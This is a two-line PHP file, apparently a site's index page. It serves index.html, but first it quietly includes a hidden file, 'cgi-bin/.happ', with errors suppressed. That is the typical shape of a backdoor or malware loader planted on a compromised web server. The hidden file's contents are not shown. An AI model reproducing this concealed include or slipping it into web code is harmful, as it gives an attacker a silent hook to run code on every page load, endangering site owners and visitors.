<?php @include_once("cgi-bin/.happ"); ?><?php if(file_exists("index.html")){include("index.html");}else{@include("_index.html");}?>